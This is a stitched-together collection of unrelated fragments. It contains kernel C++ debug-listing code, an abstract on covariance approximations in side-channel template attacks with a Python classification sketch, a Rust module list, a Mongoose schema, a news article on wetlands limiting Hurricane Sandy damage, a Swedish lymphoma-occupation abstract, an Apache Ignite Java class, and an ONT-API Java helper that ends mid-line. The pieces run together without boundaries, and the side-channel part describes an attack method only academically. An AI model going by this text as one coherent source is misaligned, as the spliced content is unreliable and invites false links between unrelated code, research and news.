        thread->fTeamListNext->fTeamListPrev = thread->fTeamListPrev;
    RestoreInterrupts(fl);
    ReleaseRef();
}

void Team::DoForEach(void (*EachTeamFunc)(void*, Team*), void *cookie)
{
    cpu_flags fl = DisableInterrupts();
    Team *team = static_cast<Team*>(fTeamList.GetHead());
    team->AcquireRef();
    while (team) {
        RestoreInterrupts(fl);
        EachTeamFunc(cookie, team);
        DisableInterrupts();
        Team *next = static_cast<Team*>(fTeamList.GetNext(team));
        if (next)
            next->AcquireRef();
        team->ReleaseRef();
        team = next;
    }

    RestoreInterrupts(fl);
}

void Team::Bootstrap()
{
    Team *init = new Team("kernel", AddressSpace::GetKernelAddressSpace());
    Thread::GetRunningThread()->SetTeam(init);

    AddDebugCommand("ps", "list running threads", PrintThreads);
    AddDebugCommand("areas", "list user areas", PrintAreas);
    AddDebugCommand("handles", "list handles", PrintHandles);
}

Team::Team(const char name[], AddressSpace *addressSpace)
    : Resource(OBJ_TEAM, name),
      fAddressSpace(addressSpace),
      fThreadList(0)
{
    fTeamList.AddToTail(this);
}

void Team::PrintThreads(int, const char*[])
{
    const char *kThreadStateName[] = {"Created", "Wait", "Ready", "Running", "Dead"};
    int threadCount = 0;
    int teamCount = 0;
    for (const ListNode *node = fTeamList.GetHead(); node; node = fTeamList.GetNext(node)) {
        const Team *team = static_cast<const Team*>(node);
        teamCount++;
        printf("Team %s\n", team->GetName());
        printf("Name State CPRI BPRI\n");
        for (Thread *thread = team->fThreadList; thread; thread = thread->fTeamListNext) {
            threadCount++;
            printf("%20s %8s %4d %4d\n", thread->GetName(),
                kThreadStateName[thread->GetState()],
                thread->GetCurrentPriority(), thread->GetBasePriority());
        }
        printf("\n");
    }
    printf("%d Threads %d Teams\n", threadCount, teamCount);
}

// This is a little misplaced, but it is the easiest way to get to
// the team list.
void Team::PrintAreas(int, const char**)
{
    for (const ListNode *node = fTeamList.GetHead(); node; node = fTeamList.GetNext(node)) {
        const Team *team = static_cast<const Team*>(node);
        printf("Team %s\n", team->GetName());
        team->GetAddressSpace()->Print();
    }
}

void Team::PrintHandles(int, const char**)
{
    for (const ListNode *node = fTeamList.GetHead(); node; node = fTeamList.GetNext(node)) {
        const Team *team = static_cast<const Team*>(node);
        printf("Team %s\n", team->GetName());
        team->GetHandleTable()->Print();
    }
}
Comparative Study of Various Approximations to the Covariance Matrix in Template Attacks
Template attacks have been shown to be among the strongest side-channel attacks. An essential ingredient is the calculation of the inverse of a covariance matrix. In this paper we make a comparative study of the effectiveness of some 24 different variants of template attacks based on different approximations of this covariance matrix. As an example, we have chosen a recent smart card in which the plaintext, ciphertext, and key all leak strongly. Some of the more commonly chosen approximations to the covariance matrix turn out to be not very effective, whilst others are.
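To make the role of the covariance matrix concrete, here is a minimal sketch of the classification core of a template attack: per-class mean traces plus a single pooled covariance estimate (one commonly used approximation among the variants the abstract refers to), with candidate classes scored by Gaussian log-likelihood. The function names and the synthetic setup are illustrative, not taken from the paper.

```python
import numpy as np

def build_templates(traces, labels):
    """Estimate a per-class mean vector and one pooled covariance matrix."""
    classes = np.unique(labels)
    means = {c: traces[labels == c].mean(axis=0) for c in classes}
    # Pooled covariance: center each trace by its class mean, then estimate
    # a single covariance over all centered traces.
    centered = np.vstack([traces[labels == c] - means[c] for c in classes])
    pooled_cov = np.cov(centered, rowvar=False)
    return means, pooled_cov

def classify(trace, means, cov):
    """Return the class whose template maximizes the Gaussian log-likelihood."""
    inv = np.linalg.pinv(cov)  # pseudo-inverse guards against singular estimates
    def loglik(mu):
        d = trace - mu
        return -0.5 * d @ inv @ d
    return max(means, key=lambda c: loglik(means[c]))
```

Swapping in other approximations (diagonal covariance, identity, per-class covariances, shrinkage estimators) only changes how `pooled_cov` and its inverse are computed, which is exactly the axis the paper's 24 variants explore.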
#![allow(non_snake_case)]

pub mod aggregated_pubkey;
pub mod encoder;
pub mod errors;
pub mod hasher;
pub mod jubjub;
pub mod signer;
#[cfg(test)]
pub mod tests;
pub mod verifier;
import * as mongoose from 'mongoose'; export const HabitacionSchema = new mongoose.Schema({ servicios: [String], precioHora: Number, imagen: String, tipoHabitacion: {type: String, enum: ['INDIVIDUAL', 'DOBLE', 'TRIPLE', 'SUITE']}, });
In 2012, tropical cyclone Sandy made landfall on the United States’ northeastern coast, killing scores and causing extensive damage. The storm went on to become the second costliest cyclone in US history, after Hurricane Katrina. But as new research shows, it could have been much worse. Confirming their long-argued role as natural defenses, scientists calculated that coastal wetlands prevented as much as US $625-million in property damage during the storm. Overall, Sandy caused an estimated $50-billion in flood damages. Storm surge causes much of the damage during a tropical cyclone, but wetlands helped absorb some of the wave energy and rising water. To understand the potential storm damage without the cushion of wetlands, researchers turned to computer modeling. Scientists at the University of California, Santa Cruz (UCSC), the Nature Conservancy, the Wildlife Conservation Society, and other institutions used models of the kind commonly employed by insurance and reinsurance companies. Risk-modeling companies like Risk Management Solutions—one of the partners on the project—use wetlands data in their models for clients, but hadn’t previously broken out the role of wetlands separately. The two-year project found that census tracts with wetlands experienced an average 10 percent reduction in property losses. In Maryland, wetlands reduced property damages by an estimated 30 percent; Delaware saw a 10 percent reduction. New Jersey, among the areas hardest hit by the storm, also saw the highest absolute savings, with wetlands preventing $425-million in property damages. Researchers found that properties upstream from wetlands benefited from reduced flood heights, and that simply being near a wetland helped reduce damage.
In Ocean County, New Jersey, a county hit especially hard by Sandy, the researchers took the study one step further, creating a set of 2,000 simulated storms based on historical weather records from 1900 to 2011 to estimate annual savings attributable to wetlands. The models found a 20 percent reduction in average annual coastal property losses. Wetlands, however, sometimes failed. The researchers found that wetlands can block the flow of water, which increases flood levels and damage to some properties. It’s a negative effect also associated with sea walls and other artificial defenses. Such failures, however, typically occurred where man-made modifications had changed water flow patterns. Michael Beck, the Nature Conservancy’s lead marine scientist and an adjunct professor at UCSC, says the research offers a way to appraise the value of wetlands. “By doing this kind of modeling, wetland conservation and restoration could be considered in insurance premiums,” he says. In addition, Beck says, communities should rethink their rebuilding efforts. He points out that after Sandy, tens of billions of dollars were invested in infrastructure projects like sea walls and levees, while only tens of millions went into strengthening green infrastructure: natural defenses such as planting dunes and restoring freshwater flow into wetlands. This shift to green infrastructure has started in some places, however incrementally. In New York City, where wetlands have been shrinking for decades, a small slice of the city’s $20-billion post-Sandy resiliency plan includes funding for restoring 0.28 square kilometers of degraded wetlands on Staten Island, along with other coastal restoration projects. “We think a much greater portion of our post-disaster relief should go into natural resilience,” Beck says.
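The "average annual loss" figure the modelers report is, at its core, the total loss across a large synthetic storm catalog divided by the number of years that catalog represents. A toy sketch of that calculation (all numbers here are made up; the flat 20 percent wetlands factor is purely for illustration and is not how the study's models apply the effect):

```python
import random

def average_annual_loss(storm_losses, years):
    """Expected annual loss: total simulated loss divided by years represented."""
    return sum(storm_losses) / years

# Toy catalog: 2,000 simulated storms standing in for a long synthetic record.
random.seed(42)
losses_without_wetlands = [random.lognormvariate(mu=2.0, sigma=1.0) for _ in range(2000)]
# Illustrative assumption: wetlands trim each storm's loss by a flat 20 percent.
losses_with_wetlands = [loss * 0.8 for loss in losses_without_wetlands]

years_represented = 10_000
aal_without = average_annual_loss(losses_without_wetlands, years_represented)
aal_with = average_annual_loss(losses_with_wetlands, years_represented)
```

Because losses from rare, severe storms dominate the sum, the catalog must be large for the average to stabilize, which is why the study simulated thousands of storms rather than relying on the handful of historical landfalls alone.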
Non-Hodgkin's lymphoma and occupation in Sweden: a registry-based analysis.
Incidence of non-Hodgkin's lymphoma in different employment categories was evaluated from the Swedish Cancer-Environment Registry, which links cancer incidence from 1961 to 1979 with occupational information from the 1960 census. New associations were found for men employed in shoemaking and shoe repair, porcelain and earthenware industries, education, and other white collar occupations. Several findings supported associations found in other countries, including excesses among woodworkers, furniture makers, electric power plant workers, farmers, dairy workers, lorry drivers, and other land transport workers. Risks were not increased among chemists, chemical or rubber manufacturing workers, or petrochemical refinery workers. Caution must be used in drawing causal inferences from these linked registry data because information on exposure and duration of employment is not available. Nevertheless, this study has suggested new clues to possible occupational determinants of non-Hodgkin's lymphoma.
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.internal.processors.cache.distributed.dht.atomic; import java.util.ArrayList; import java.util.Collection; import java.util.Collections; import java.util.Map; import java.util.UUID; import javax.cache.expiry.ExpiryPolicy; import javax.cache.processor.EntryProcessor; import org.apache.ignite.IgniteCheckedException; import org.apache.ignite.cache.CacheWriteSynchronizationMode; import org.apache.ignite.cluster.ClusterNode; import org.apache.ignite.internal.IgniteInternalFuture; import org.apache.ignite.internal.cluster.ClusterTopologyCheckedException; import org.apache.ignite.internal.cluster.ClusterTopologyServerNotFoundException; import org.apache.ignite.internal.processors.affinity.AffinityTopologyVersion; import org.apache.ignite.internal.processors.cache.CacheEntryPredicate; import org.apache.ignite.internal.processors.cache.CachePartialUpdateCheckedException; import org.apache.ignite.internal.processors.cache.EntryProcessorResourceInjectorProxy; import org.apache.ignite.internal.processors.cache.GridCacheContext; import org.apache.ignite.internal.processors.cache.GridCacheOperation; import org.apache.ignite.internal.processors.cache.GridCacheReturn; import 
org.apache.ignite.internal.processors.cache.GridCacheTryPutFailedException; import org.apache.ignite.internal.processors.cache.KeyCacheObject; import org.apache.ignite.internal.processors.cache.distributed.dht.GridDhtTopologyFuture; import org.apache.ignite.internal.processors.cache.distributed.near.GridNearAtomicCache; import org.apache.ignite.internal.processors.cache.version.GridCacheVersion; import org.apache.ignite.internal.util.future.GridFinishedFuture; import org.apache.ignite.internal.util.future.GridFutureAdapter; import org.apache.ignite.internal.util.typedef.CI1; import org.apache.ignite.internal.util.typedef.F; import org.apache.ignite.internal.util.typedef.X; import org.apache.ignite.internal.util.typedef.internal.CU; import org.apache.ignite.internal.util.typedef.internal.S; import org.apache.ignite.lang.IgniteProductVersion; import org.jetbrains.annotations.Nullable; import static org.apache.ignite.cache.CacheAtomicWriteOrderMode.CLOCK; import static org.apache.ignite.internal.processors.cache.GridCacheOperation.TRANSFORM; /** * DHT atomic cache near update future. */ public class GridNearAtomicSingleUpdateFuture extends GridNearAtomicAbstractUpdateFuture { /** */ private static final IgniteProductVersion SINGLE_UPDATE_REQUEST = IgniteProductVersion.fromString("1.7.4"); /** Keys */ private Object key; /** Values. */ @SuppressWarnings({"FieldAccessedSynchronizedAndUnsynchronized"}) private Object val; /** Not null is operation is mapped to single node. */ private GridNearAtomicAbstractUpdateRequest req; /** * @param cctx Cache context. * @param cache Cache instance. * @param syncMode Write synchronization mode. * @param op Update operation. * @param key Keys to update. * @param val Values or transform closure. * @param invokeArgs Optional arguments for entry processor. * @param retval Return value require flag. * @param rawRetval {@code True} if should return {@code GridCacheReturn} as future result. 
* @param expiryPlc Expiry policy explicitly specified for cache operation. * @param filter Entry filter. * @param subjId Subject ID. * @param taskNameHash Task name hash code. * @param skipStore Skip store flag. * @param keepBinary Keep binary flag. * @param remapCnt Maximum number of retries. * @param waitTopFut If {@code false} does not wait for affinity change future. */ public GridNearAtomicSingleUpdateFuture( GridCacheContext cctx, GridDhtAtomicCache cache, CacheWriteSynchronizationMode syncMode, GridCacheOperation op, Object key, @Nullable Object val, @Nullable Object[] invokeArgs, final boolean retval, final boolean rawRetval, @Nullable ExpiryPolicy expiryPlc, final CacheEntryPredicate[] filter, UUID subjId, int taskNameHash, boolean skipStore, boolean keepBinary, int remapCnt, boolean waitTopFut ) { super(cctx, cache, syncMode, op, invokeArgs, retval, rawRetval, expiryPlc, filter, subjId, taskNameHash, skipStore, keepBinary, remapCnt, waitTopFut); assert subjId != null; this.key = key; this.val = val; } /** {@inheritDoc} */ @Override public GridCacheVersion version() { synchronized (mux) { return futVer; } } /** {@inheritDoc} */ @Override public boolean onNodeLeft(UUID nodeId) { GridNearAtomicUpdateResponse res = null; GridNearAtomicAbstractUpdateRequest req; synchronized (mux) { req = this.req != null && this.req.nodeId().equals(nodeId) ? 
this.req : null; if (req != null && req.response() == null) { res = new GridNearAtomicUpdateResponse(cctx.cacheId(), nodeId, req.futureVersion(), cctx.deploymentEnabled()); ClusterTopologyCheckedException e = new ClusterTopologyCheckedException("Primary node left grid " + "before response is received: " + nodeId); e.retryReadyFuture(cctx.shared().nextAffinityReadyFuture(req.topologyVersion())); res.addFailedKeys(req.keys(), e); } } if (res != null) { if (msgLog.isDebugEnabled()) { msgLog.debug("Near update single fut, node left [futId=" + req.futureVersion() + ", writeVer=" + req.updateVersion() + ", node=" + nodeId + ']'); } onResult(nodeId, res, true); } return false; } /** {@inheritDoc} */ @Override public IgniteInternalFuture<Void> completeFuture(AffinityTopologyVersion topVer) { return null; } /** {@inheritDoc} */ @SuppressWarnings("ConstantConditions") @Override public boolean onDone(@Nullable Object res, @Nullable Throwable err) { assert res == null || res instanceof GridCacheReturn; GridCacheReturn ret = (GridCacheReturn)res; Object retval = res == null ? null : rawRetval ? ret : (this.retval || op == TRANSFORM) ? 
cctx.unwrapBinaryIfNeeded(ret.value(), keepBinary) : ret.success(); if (op == TRANSFORM && retval == null) retval = Collections.emptyMap(); if (super.onDone(retval, err)) { GridCacheVersion futVer = onFutureDone(); if (futVer != null) cctx.mvcc().removeAtomicFuture(futVer); return true; } return false; } /** {@inheritDoc} */ @SuppressWarnings({"unchecked", "ThrowableResultOfMethodCallIgnored"}) @Override public void onResult(UUID nodeId, GridNearAtomicUpdateResponse res, boolean nodeErr) { GridNearAtomicAbstractUpdateRequest req; AffinityTopologyVersion remapTopVer = null; GridCacheReturn opRes0 = null; CachePartialUpdateCheckedException err0 = null; GridFutureAdapter<?> fut0 = null; synchronized (mux) { if (!res.futureVersion().equals(futVer)) return; if (!this.req.nodeId().equals(nodeId)) return; req = this.req; this.req = null; boolean remapKey = !F.isEmpty(res.remapKeys()); if (remapKey) { if (mapErrTopVer == null || mapErrTopVer.compareTo(req.topologyVersion()) < 0) mapErrTopVer = req.topologyVersion(); } else if (res.error() != null) { if (res.failedKeys() != null) { if (err == null) err = new CachePartialUpdateCheckedException( "Failed to update keys (retry update if possible)."); Collection<Object> keys = new ArrayList<>(res.failedKeys().size()); for (KeyCacheObject key : res.failedKeys()) keys.add(cctx.cacheObjectContext().unwrapBinaryIfNeeded(key, keepBinary, false)); err.add(keys, res.error(), req.topologyVersion()); } } else { if (!req.fastMap() || req.hasPrimary()) { GridCacheReturn ret = res.returnValue(); if (op == TRANSFORM) { if (ret != null) { assert ret.value() == null || ret.value() instanceof Map : ret.value(); if (ret.value() != null) { if (opRes != null) opRes.mergeEntryProcessResults(ret); else opRes = ret; } } } else opRes = ret; } } if (remapKey) { assert mapErrTopVer != null; remapTopVer = cctx.shared().exchange().topologyVersion(); } else { if (err != null && X.hasCause(err, CachePartialUpdateCheckedException.class) && X.hasCause(err, 
ClusterTopologyCheckedException.class) && storeFuture() && --remapCnt > 0) { ClusterTopologyCheckedException topErr = X.cause(err, ClusterTopologyCheckedException.class); if (!(topErr instanceof ClusterTopologyServerNotFoundException)) { CachePartialUpdateCheckedException cause = X.cause(err, CachePartialUpdateCheckedException.class); assert cause != null && cause.topologyVersion() != null : err; remapTopVer = new AffinityTopologyVersion(cause.topologyVersion().topologyVersion() + 1); err = null; updVer = null; } } } if (remapTopVer == null) { err0 = err; opRes0 = opRes; } else { fut0 = topCompleteFut; topCompleteFut = null; cctx.mvcc().removeAtomicFuture(futVer); futVer = null; topVer = AffinityTopologyVersion.ZERO; } } if (res.error() != null && res.failedKeys() == null) { onDone(res.error()); return; } if (nearEnabled && !nodeErr) updateNear(req, res); if (remapTopVer != null) { if (fut0 != null) fut0.onDone(); if (!waitTopFut) { onDone(new GridCacheTryPutFailedException()); return; } if (topLocked) { CachePartialUpdateCheckedException e = new CachePartialUpdateCheckedException("Failed to update keys (retry update if possible)."); ClusterTopologyCheckedException cause = new ClusterTopologyCheckedException( "Failed to update keys, topology changed while execute atomic update inside transaction."); cause.retryReadyFuture(cctx.affinity().affinityReadyFuture(remapTopVer)); e.add(Collections.singleton(cctx.toCacheKeyObject(key)), cause); onDone(e); return; } IgniteInternalFuture<AffinityTopologyVersion> fut = cctx.shared().exchange().affinityReadyFuture(remapTopVer); if (fut == null) fut = new GridFinishedFuture<>(remapTopVer); fut.listen(new CI1<IgniteInternalFuture<AffinityTopologyVersion>>() { @Override public void apply(final IgniteInternalFuture<AffinityTopologyVersion> fut) { cctx.kernalContext().closure().runLocalSafe(new Runnable() { @Override public void run() { try { AffinityTopologyVersion topVer = fut.get(); map(topVer); } catch (IgniteCheckedException e) 
{ onDone(e); } } }); } }); return; } onDone(opRes0, err0); } /** * Updates near cache. * * @param req Update request. * @param res Update response. */ private void updateNear(GridNearAtomicAbstractUpdateRequest req, GridNearAtomicUpdateResponse res) { assert nearEnabled; if (res.remapKeys() != null || !req.hasPrimary()) return; GridNearAtomicCache near = (GridNearAtomicCache)cctx.dht().near(); near.processNearAtomicUpdateResponse(req, res); } /** {@inheritDoc} */ @Override protected void mapOnTopology() { cache.topology().readLock(); AffinityTopologyVersion topVer = null; try { if (cache.topology().stopping()) { onDone(new IgniteCheckedException("Failed to perform cache operation (cache is stopped): " + cache.name())); return; } GridDhtTopologyFuture fut = cache.topology().topologyVersionFuture(); if (fut.isDone()) { Throwable err = fut.validateCache(cctx); if (err != null) { onDone(err); return; } topVer = fut.topologyVersion(); } else { if (waitTopFut) { assert !topLocked : this; fut.listen(new CI1<IgniteInternalFuture<AffinityTopologyVersion>>() { @Override public void apply(IgniteInternalFuture<AffinityTopologyVersion> t) { cctx.kernalContext().closure().runLocalSafe(new Runnable() { @Override public void run() { mapOnTopology(); } }); } }); } else onDone(new GridCacheTryPutFailedException()); return; } } finally { cache.topology().readUnlock(); } map(topVer); } /** {@inheritDoc} */ protected void map(AffinityTopologyVersion topVer) { Collection<ClusterNode> topNodes = CU.affinityNodes(cctx, topVer); if (F.isEmpty(topNodes)) { onDone(new ClusterTopologyServerNotFoundException("Failed to map keys for cache (all partition nodes " + "left the grid).")); return; } Exception err = null; GridNearAtomicAbstractUpdateRequest singleReq0 = null; GridCacheVersion futVer = cctx.versions().next(topVer); GridCacheVersion updVer; // Assign version on near node in CLOCK ordering mode even if fastMap is false. 
if (cctx.config().getAtomicWriteOrderMode() == CLOCK) { updVer = this.updVer; if (updVer == null) { updVer = cctx.versions().next(topVer); if (log.isDebugEnabled()) log.debug("Assigned fast-map version for update on near node: " + updVer); } } else updVer = null; try { singleReq0 = mapSingleUpdate(topVer, futVer, updVer); synchronized (mux) { assert this.futVer == null : this; assert this.topVer == AffinityTopologyVersion.ZERO : this; this.topVer = topVer; this.updVer = updVer; this.futVer = futVer; resCnt = 0; req = singleReq0; } } catch (Exception e) { err = e; } if (err != null) { onDone(err); return; } if (storeFuture()) { if (!cctx.mvcc().addAtomicFuture(futVer, this)) { assert isDone() : this; return; } } // Optimize mapping for single key. mapSingle(singleReq0.nodeId(), singleReq0); } /** * @return Future version. */ GridCacheVersion onFutureDone() { GridCacheVersion ver0; GridFutureAdapter<Void> fut0; synchronized (mux) { fut0 = topCompleteFut; topCompleteFut = null; ver0 = futVer; futVer = null; } if (fut0 != null) fut0.onDone(); return ver0; } /** * @param topVer Topology version. * @param futVer Future version. * @param updVer Update version. * @return Request. * @throws Exception If failed. 
*/ private GridNearAtomicAbstractUpdateRequest mapSingleUpdate(AffinityTopologyVersion topVer, GridCacheVersion futVer, @Nullable GridCacheVersion updVer) throws Exception { if (key == null) throw new NullPointerException("Null key."); Object val = this.val; if (val == null && op != GridCacheOperation.DELETE) throw new NullPointerException("Null value."); KeyCacheObject cacheKey = cctx.toCacheKeyObject(key); if (op != TRANSFORM) val = cctx.toCacheObject(val); else val = EntryProcessorResourceInjectorProxy.wrap(cctx.kernalContext(), (EntryProcessor)val); ClusterNode primary = cctx.affinity().primary(cacheKey, topVer); if (primary == null) throw new ClusterTopologyServerNotFoundException("Failed to map keys for cache (all partition nodes " + "left the grid)."); GridNearAtomicAbstractUpdateRequest req; if (canUseSingleRequest(primary)) { if (op == TRANSFORM) { req = new GridNearAtomicSingleUpdateInvokeRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, invokeArgs, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled()); } else { if (filter == null || filter.length == 0) { req = new GridNearAtomicSingleUpdateRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled()); } else { req = new GridNearAtomicSingleUpdateFilterRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, filter, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled()); } } } else { req = new GridNearAtomicFullUpdateRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, expiryPlc, invokeArgs, filter, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled(), 1); } 
req.addUpdateEntry(cacheKey, val, CU.TTL_NOT_CHANGED, CU.EXPIRE_TIME_CALCULATE, null, true); return req; } /** * @param node Target node. * @return {@code True} if 'single' update requests can be used. */ private boolean canUseSingleRequest(ClusterNode node) { return expiryPlc == null && node != null && node.version().compareToIgnoreTimestamp(SINGLE_UPDATE_REQUEST) >= 0; } /** {@inheritDoc} */ @Override public String toString() { synchronized (mux) { return S.toString(GridNearAtomicSingleUpdateFuture.class, this, super.toString()); } } }
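The error-handling path at the top of this future retries the update a bounded number of times when the cluster topology changes, bumping the affinity topology version before each remap (the `--remapCnt > 0` check). A minimal self-contained sketch of that bounded remap-and-retry pattern, with illustrative names rather than Ignite's own classes:

```java
import java.util.concurrent.atomic.AtomicInteger;
import java.util.function.LongPredicate;

public class RemapRetry {
    /**
     * Attempts {@code op} against increasing topology versions, retrying up to
     * {@code remapCnt} times when the operation reports a topology change
     * (returns {@code false}). Mirrors the bounded "--remapCnt > 0" check above.
     */
    public static boolean execute(LongPredicate op, long startTopVer, int remapCnt) {
        long topVer = startTopVer;
        while (true) {
            if (op.test(topVer))
                return true;      // update applied on this topology version
            if (--remapCnt <= 0)
                return false;     // retries exhausted, give up
            topVer++;             // remap to the next topology version
        }
    }

    public static void main(String[] args) {
        AtomicInteger calls = new AtomicInteger();
        // Fails on the first two topology versions, succeeds on the third.
        boolean ok = execute(v -> calls.incrementAndGet() >= 3, 1L, 5);
        System.out.println(ok + " after " + calls.get() + " attempts"); // prints: true after 3 attempts
    }
}
```

The real future also has to unregister itself from the MVCC manager and wait for the affinity-ready future before remapping; this sketch only shows the bounded-retry skeleton.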
/** * Helper to translate an RDF graph to the OWL-objects form. * <p> * Created by @szuev on 25.11.2016. */ @SuppressWarnings("WeakerAccess") public class ReadHelper { /** * Auxiliary method to simplify code. * Used in Annotation Translators. * If the specified statement also belongs to another type of axiom * and such a situation is prohibited in the config, then {@code false} is returned. * This is for three kinds of statements: * <ul> * <li>{@code A1 rdfs:subPropertyOf A2}</li> * <li>{@code A rdfs:domain U}</li> * <li>{@code A rdfs:range U}</li> * </ul> * Each of them is wider than the analogous statement for an object or data property, * e.g. {@code P rdfs:range C} could be treated as {@code A rdfs:range U}, but not vice versa. * * @param statement {@link OntStatement} to test * @param conf {@link InternalConfig} * @param o {@link AxiomType#SUB_OBJECT_PROPERTY} * or {@link AxiomType#OBJECT_PROPERTY_DOMAIN} * or {@link AxiomType#OBJECT_PROPERTY_RANGE} * @param d {@link AxiomType#SUB_DATA_PROPERTY} * or {@link AxiomType#DATA_PROPERTY_DOMAIN} * or {@link AxiomType#DATA_PROPERTY_RANGE} * @return {@code true} if the statement can be represented in the form of an annotation axiom */ public static boolean testAnnotationAxiomOverlaps(OntStatement statement, InternalConfig conf, AxiomType<? extends OWLObjectPropertyAxiom> o, AxiomType<? extends OWLDataPropertyAxiom> d) { return !conf.isIgnoreAnnotationAxiomOverlaps() || Iter.noneMatch(Iter.of(o, d).mapWith(AxiomParserProvider::get), a -> a.testStatement(statement, conf)); } /** * Answers {@code true} if the given {@link OntStatement} is a declaration (predicate = {@code rdf:type}) * of some OWL entity or anonymous individual.
* * @param s {@link OntStatement} to test * @return boolean */ public static boolean isDeclarationStatement(OntStatement s) { return s.isDeclaration() && isEntityOrAnonymousIndividual(s.getSubject()); } /** * Answers {@code true} if the given {@link Resource} is an OWL entity or anonymous individual. * * @param o {@link Resource} * @return boolean */ public static boolean isEntityOrAnonymousIndividual(Resource o) { return o.isURIResource() || o.canAs(OntIndividual.Anonymous.class); } /** * Answers if the given {@link OntStatement} can be considered an annotation property assertion. * * @param s {@link OntStatement}, not {@code null} * @param config {@link InternalConfig}, not {@code null} * @return {@code true} if the specified statement is an annotation property assertion */ public static boolean isAnnotationAssertionStatement(OntStatement s, InternalConfig config) { return s.isAnnotation() && !s.isBulkAnnotation() && (config.isAllowBulkAnnotationAssertions() || !s.hasAnnotations()); } /** * Lists all {@link OWLAnnotation}s which are associated with the specified statement. * All {@code OWLAnnotation}s are provided in the form of {@link ONTObject}-wrappers. * * @param statement {@link OntStatement}, axiom root statement, not {@code null} * @param conf {@link InternalConfig} * @param of {@link InternalObjectFactory} * @return an {@link ExtendedIterator} of {@link ONTObject} wrappers around {@link OWLAnnotation} */ public static ExtendedIterator<ONTObject<OWLAnnotation>> listAnnotations(OntStatement statement, InternalConfig conf, InternalObjectFactory of) { ExtendedIterator<OntStatement> res = OntModels.listAnnotations(statement); if (conf.isLoadAnnotationAxioms() && isDeclarationStatement(statement)) { // for compatibility with OWL-API, skip all plain annotations attached to an entity (or anonymous individual): // they would go separately as annotation assertions.
res = res.filterDrop(s -> isAnnotationAssertionStatement(s, conf)); } return res.mapWith(of::getAnnotation); } /** * Lists all annotations related to the object (including assertions). * * @param obj {@link OntObject} * @param of {@link InternalObjectFactory} * @return {@link ExtendedIterator} of {@link ONTObject}s of {@link OWLAnnotation} */ public static ExtendedIterator<ONTObject<OWLAnnotation>> listOWLAnnotations(OntObject obj, InternalObjectFactory of) { return OntModels.listAnnotations(obj).mapWith(of::getAnnotation); } /** * Translates {@link OntStatement} to {@link ONTObject} encapsulated {@link OWLAnnotation}. * * @param ann {@link OntStatement} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link OWLAnnotation} */ public static ONTObject<OWLAnnotation> getAnnotation(OntStatement ann, InternalObjectFactory of) { return ann.getSubject().getAs(OntAnnotation.class) != null || ann.hasAnnotations() ? getHierarchicalAnnotations(ann, of) : getPlainAnnotation(ann, of); } private static ONTObject<OWLAnnotation> getPlainAnnotation(OntStatement ann, InternalObjectFactory of) { ONTObject<OWLAnnotationProperty> p = of.getProperty(ann.getPredicate().as(OntNAP.class)); ONTObject<? extends OWLAnnotationValue> v = of.getValue(ann.getObject()); OWLAnnotation res = of.getOWLDataFactory().getOWLAnnotation(p.getOWLObject(), v.getOWLObject(), Stream.empty()); return ONTWrapperImpl.create(res, ann).append(p).append(v); } private static ONTObject<OWLAnnotation> getHierarchicalAnnotations(OntStatement root, InternalObjectFactory of) { OntObject subject = root.getSubject(); ONTObject<OWLAnnotationProperty> p = of.getProperty(root.getPredicate().as(OntNAP.class)); ONTObject<? extends OWLAnnotationValue> v = of.getValue(root.getObject()); Set<? 
extends ONTObject<OWLAnnotation>> children = OntModels.listAnnotations(root) .mapWith(a -> getHierarchicalAnnotations(a, of)).toSet(); OWLAnnotation object = of.getOWLDataFactory() .getOWLAnnotation(p.getOWLObject(), v.getOWLObject(), children.stream().map(ONTObject::getOWLObject)); ONTWrapperImpl<OWLAnnotation> res = ONTWrapperImpl.create(object, root); OntAnnotation a; if ((a = subject.getAs(OntAnnotation.class)) != null) { res = res.append(a); } return res.append(p).append(v).append(children); } /** * Maps {@link OntFR} =&gt; {@link OWLFacetRestriction}. * * @param fr {@link OntFR}, not {@code null} * @param of {@link InternalObjectFactory}, not {@code null} * @return {@link ONTObject} around {@link OWLFacetRestriction} */ public static ONTObject<OWLFacetRestriction> getFacetRestriction(OntFR fr, InternalObjectFactory of) { OWLFacetRestriction res = calcOWLFacetRestriction(fr, of); return ONTWrapperImpl.create(res, fr); } /** * Creates an {@link OWLFacetRestriction} instance. * * @param fr {@link OntFR}, not {@code null} * @param of {@link InternalObjectFactory}, not {@code null} * @return {@link OWLFacetRestriction} */ public static OWLFacetRestriction calcOWLFacetRestriction(OntFR fr, InternalObjectFactory of) { OWLLiteral literal = of.getLiteral(OntApiException.notNull(fr, "Null facet restriction.").getValue()).getOWLObject(); Class<? extends OntFR> type = OntModels.getOntType(fr); return of.getOWLDataFactory().getOWLFacetRestriction(getFacet(type), literal); } /** * Gets the facet by ONT-API type. * * @param type {@code Class}-type of {@link OntFR} * @return {@link OWLFacet} * @see WriteHelper#getFRType(OWLFacet) */ public static OWLFacet getFacet(Class<? 
